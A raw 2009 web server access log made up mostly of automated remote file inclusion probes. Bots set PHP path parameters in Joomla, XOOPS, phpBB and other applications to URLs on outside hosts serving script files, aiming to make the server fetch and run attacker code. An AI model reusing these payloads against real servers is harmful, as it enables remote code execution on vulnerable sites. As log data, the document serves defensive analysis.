62.146.68.61 - - [19/May/2009:04:06:55 -0400] "GET /logs/error_log.Q109050500%20%20/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:06:56 -0400] "GET /logs/access_log.Q109021400%20%20/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.135.148.59 - - [19/May/2009:04:07:16 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
195.135.148.59 - - [19/May/2009:04:07:16 -0400] "GET //index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
195.135.148.59 - - [19/May/2009:04:07:16 -0400] "GET /logs//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
201.40.77.100 - - [19/May/2009:04:07:21 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kojo.com.tw/kojo//cache/lang/pw.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
219.94.148.39 - - [19/May/2009:04:07:28 -0400] "GET /logs/access_log.Q109051100/?phpbb_root_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:04:07:29 -0400] "GET /logs/access_log.Q109051200/?phpbb_root_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:07:30 -0400] "GET /logs/access_log.Q109051200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:47 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:47 -0400] "GET /logs/access_log.Q109021400/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:50 -0400] "GET //poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:50 -0400] "GET /logs/error_log.Q109042900%20%20//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:50 -0400] "GET /logs//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:52 -0400] "GET //poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:52 -0400] "GET /logs//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:07:52 -0400] "GET /logs/error_log.Q109042900%20%20//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:07:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [19/May/2009:04:08:00 -0400] "GET /logs/error_log.Q108081200%20%20//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:08:01 -0400] "GET /logs/error_log.Q108081200%20%20//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.119.103.12 - - [19/May/2009:04:08:06 -0400] "GET /logs/access_log.Q108110900//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:04:08:06 -0400] "GET //?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:04:08:06 -0400] "GET /logs//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
62.146.68.61 - - [19/May/2009:04:08:22 -0400] "GET //poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:08:22 -0400] "GET /logs//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:08:22 -0400] "GET /logs/access_log.Q108090900//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.135.14 - - [19/May/2009:04:08:59 -0400] "GET /logs/access_log.Q108110900//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:09:00 -0400] "GET //?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:04:09:01 -0400] "GET /logs//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
213.206.91.16 - - [19/May/2009:04:09:08 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.800"
213.206.91.16 - - [19/May/2009:04:09:08 -0400] "GET //index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.800"
213.206.91.16 - - [19/May/2009:04:09:08 -0400] "GET /logs//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.800"
208.64.202.134 - - [19/May/2009:04:09:21 -0400] "GET /logs/access_log.Q109051200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:09:25 -0400] "GET /logs/error_log.Q109042900//poll/booth.php?include_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:09:41 -0400] "GET /logs/error_log.Q108052600/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:04:09:46 -0400] "GET /logs/error_log.Q108052600/errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:04:09:46 -0400] "GET /logs/access_log.Q108111500/inc/cmses/aedatingCMS.php?dir[inc]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:04:11:35 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:04:11:35 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:04:11:35 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:12:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.141.54.240 - - [19/May/2009:04:13:31 -0400] "GET /logs/access_log.Q108053100/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:13:31 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.135.148.59 - - [19/May/2009:04:13:34 -0400] "GET /logs/error_log.Q109051100//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
121.165.73.157 - - [19/May/2009:04:13:40 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:04:13:40 -0400] "GET //main.php?sayfa=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:04:13:40 -0400] "GET /logs//main.php?sayfa=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.249.72.114 - - [19/May/2009:04:14:10 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0044F74B09A0C400F2DB049+WSEQ(S0060):1+OUITEM(A0200):05560000 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.198.53.173 - - [19/May/2009:04:14:14 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [19/May/2009:04:14:22 -0400] "GET /logs/access_log.Q108122200//main.php?sayfa=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:04:15:38 -0400] "GET /logs/access_log.Q108091300/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:04:15:38 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:04:15:38 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:04:15:40 -0400] "GET ///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:15:40 -0400] "GET /logs///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1960 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:15:40 -0400] "GET /logs/access_log.Q108122500///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:15:42 -0400] "GET ///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:15:42 -0400] "GET /logs///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1960 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:15:42 -0400] "GET /logs/access_log.Q108122500///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [19/May/2009:04:16:11 -0400] "GET /logs/access_log.Q109032900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
213.206.91.16 - - [19/May/2009:04:16:19 -0400] "GET /shop/index.php?_shop_path=http://www.latinintel-tc.com/pages/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.206.91.16 - - [19/May/2009:04:16:19 -0400] "GET /logs/shop/index.php?_shop_path=http://www.latinintel-tc.com/pages/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
213.206.91.16 - - [19/May/2009:04:16:19 -0400] "GET /logs/access_log.Q109051100/shop/index.php?_shop_path=http://www.latinintel-tc.com/pages/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:16:37 -0400] "GET /logs/access_log.Q108122500%20%20///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:17:09 -0400] "GET /logs/access_log.Q108122500%20%20///?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:37 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:17:38 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:17:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.206.91.16 - - [19/May/2009:04:20:12 -0400] "GET /logs/error_log.Q109051100//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.800"
208.64.202.134 - - [19/May/2009:04:20:14 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:20:14 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.206.91.16 - - [19/May/2009:04:21:11 -0400] "GET /logs/access_log.Q109051100%20%20/shop/index.php?_shop_path=http://www.latinintel-tc.com/pages/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:21:16 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:21:16 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.30.142.171 - - [19/May/2009:04:21:48 -0400] "GET /logs/access_log.Q108030600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.94.148.39 - - [19/May/2009:04:21:58 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:04:21:58 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:04:21:58 -0400] "GET /logs/access_log.Q108090400//faqsupport/samplefaqsupport.php?path[docroot]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.94.148.39 - - [19/May/2009:04:22:09 -0400] "GET /logs/access_log.Q108090900//faqsupport/samplefaqsupport.php?path[docroot]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:04:22:38 -0400] "GET /logs//?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 1959 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:04:22:38 -0400] "GET //?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:04:22:38 -0400] "GET /logs/access_log.Q108111500//?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:23:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.164.25.243 - - [19/May/2009:04:24:26 -0400] "GET /logs/errors.php?error=http://www.reda-ek.com/twg/counter/id? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.143.98.5 - - [19/May/2009:04:24:48 -0400] "GET /logs/access_log.Q109010700//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:48 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:48 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:48 -0400] "GET /logs/access_log.Q108121000//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:50 -0400] "GET /logs/access_log.Q109010700//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:50 -0400] "GET /logs/access_log.Q108121000//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:50 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:24:50 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:04:25:51 -0400] "GET /logs/access_log.Q108102400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:04:26:06 -0400] "GET /logs/access_log.Q108111500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.191.102.117 - - [19/May/2009:04:26:07 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.80.2 - - [19/May/2009:04:26:40 -0400] "GET //?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
65.98.80.2 - - [19/May/2009:04:26:40 -0400] "GET /logs/access_log.Q109030500//?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
65.98.80.2 - - [19/May/2009:04:26:40 -0400] "GET /logs//?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 1959 "-" "libwww-perl/5.79"
218.185.20.88 - - [19/May/2009:04:26:49 -0400] "GET /logs/access_log.Q108111500%20%20//?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:04:26:54 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:27:31 -0400] "GET /logs/access_log.Q109010700%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:27:31 -0400] "GET /logs/access_log.Q108121000%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:27:36 -0400] "GET /logs/access_log.Q108121000%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:27:36 -0400] "GET /logs/access_log.Q109010700%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:28:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.171 - - [19/May/2009:04:30:05 -0400] "GET /logs/access_log.Q108071900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.232.66.198 - - [19/May/2009:04:31:16 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:16 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:16 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:16 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:16 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:16 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:20 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:20 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:20 -0400] "GET /logs/access_log.Q108110900%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:21 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:21 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:21 -0400] "GET /logs/access_log.Q108110900%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:37 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:37 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:31:37 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
